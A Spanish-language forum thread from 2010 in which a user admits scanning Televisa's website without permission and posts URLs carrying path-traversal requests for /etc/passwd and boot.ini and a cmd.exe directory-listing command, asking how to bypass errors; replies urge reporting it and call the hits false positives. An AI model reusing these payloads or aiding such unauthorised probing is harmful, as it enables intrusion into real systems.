elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  vulnerabilidad en la pagina de televisa...necesito su ayuda
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: vulnerabilidad en la pagina de televisa...necesito su ayuda  (Leído 2,605 veces)
shadownhack

Desconectado Desconectado

Mensajes: 0


Ver Perfil
vulnerabilidad en la pagina de televisa...necesito su ayuda
« en: 29 Junio 2010, 06:10 am »

hola, soy nuevo jeje, pero bueno, espero que me ayuden ;-), bueno eh hecho una auditoria de seguridad en la pagina web de televisa (obviamente sin permiso) y bueno encontré aproximadamente 252 bugs de las cuales unos 60 son de gravedad, la mayoria de los bugs tiene la vulnerabilidad de unicode,  con solo ir a la direccion que te dice el script arrogado puedes ver el disco duro y agregando otros parametros puedes transferir un archivo mediante TFTP, pero bueno, al ir a dicho link  no me permite ver lo que tiene, ya que tiene un molesto mensaje que dice, el documento que intento buscar no existe en nuestro servidor o no tiene permiso para acceder a el. bueno que puedo hacer para saltarme esto, por cierto ya lanze un exploit contra el servidor pero me arroga el mismo error, cuando trato de conectar con dichos links me dice lo mismo, bueno aqui les dejo los links

http://www.televisa.com/mailview.cgi?cmd=view&fldrname=inbox&select=1&html=../../../../../../etc/passwd


http://www.televisa.com/cgi-bin/w3-msql


http://www.televisa.com/cgi-bin/cmd1.exe?/c+dir


http://www.televisa.com/cgi-bin/websync.exe?ed=&Es=7x1x101&un=nahual&hn=lab&rpt=/scheduler/En_US/WebResources&cbn=/cgi-bin/websync.exe&dow=sun&dmy=Off&tfh=Off&lan=En_US&ix=0&amd=2&epw=WiXwWFp&mrd=-1&mrc=0&mrb=0&bnv=9&ds=7x1x101&tzs=PST8PDT


http://www.televisa.com/boilerplate.asp?NFuse_Template=../../boot.ini&NFuse_CurrentFolder=/SSLx0020Directories


buenos son algunos de 60 links, esta claro que el servidor se trata de windows, ya que estuve estudiando los links y te manejan dll y exe


salu2 espero que me ayuden

gracias



En línea

Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.720


$M


Ver Perfil WWW
Re: vulnerabilidad en la pagina de televisa...necesito su ayuda
« Respuesta #1 en: 29 Junio 2010, 06:22 am »

1. Reportalo!
2. LO SENTIMOS, NO SE ENCONTRÓ EL DOCUMENTO QUE BUSCAS
3. xD, porque me late que no las encontraste tú, sino un scanner :P
En línea

Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.
shadownhack

Desconectado Desconectado

Mensajes: 0


Ver Perfil
Re: vulnerabilidad en la pagina de televisa...necesito su ayuda
« Respuesta #2 en: 29 Junio 2010, 06:25 am »

pz obvio, usa varios scanner, ya habia podido vulnerar servidores, con metasploit,

mira, utilizo  nmap+nessus+metasploit 
En línea

Darioxhcx


Desconectado Desconectado

Mensajes: 2.292


Ver Perfil
Re: vulnerabilidad en la pagina de televisa...necesito su ayuda
« Respuesta #3 en: 29 Junio 2010, 07:32 am »

1. Reportalo!
2. LO SENTIMOS, NO SE ENCONTRÓ EL DOCUMENTO QUE BUSCAS
3. xD, porque me late que no las encontraste tú, sino un scanner :P
obvio pa
los l33ts h4x0rs usamos scanners ;D
jajajaja :P
En línea

tragantras


Desconectado Desconectado

Mensajes: 465


Ver Perfil
Re: vulnerabilidad en la pagina de televisa...necesito su ayuda
« Respuesta #4 en: 30 Junio 2010, 01:15 am »

los scaneres sueltan muchos falsos positivos, entre ellos todos los que has puesto
En línea

Colaboraciones:
1 2
EvilGoblin


Desconectado Desconectado

Mensajes: 2.323


YO NO LA VOTE!


Ver Perfil
Re: vulnerabilidad en la pagina de televisa...necesito su ayuda
« Respuesta #5 en: 5 Julio 2010, 17:54 pm »

Dudo mucho que haya usado Nessus como Dios manda =P


 Y decir "scannie y me salio esto; que hago?" demuestra lo poco que entiendes del Tema.

No hay ninguna pregunta Especifica y por eso salen respuestas Random :P
En línea

Experimental Serial Lain [Linux User]
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Deseo diseñar una pagina web de noticias y necesito ayuda
Dudas Generales
raulrivero 1 1,473 Último mensaje 8 Marzo 2011, 18:17 pm
por #!drvy
necesito ayuda con css en mi pagina
Desarrollo Web
ime 6 2,122 Último mensaje 7 Diciembre 2013, 12:55 pm
por alan++
Vulnerabilidad web ayuda!
Nivel Web
Shadow_killer 3 2,140 Último mensaje 25 Agosto 2015, 20:38 pm
por LaThortilla (Effort)
[Ayuda] Vulnerabilidad ms12_020
Bugs y Exploits
F0cK3R 2 2,033 Último mensaje 13 Septiembre 2016, 02:30 am
por F0cK3R
ayuda par vulnerabilidad
Bugs y Exploits
jose020997 0 946 Último mensaje 11 Octubre 2017, 13:18 pm
por jose020997
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines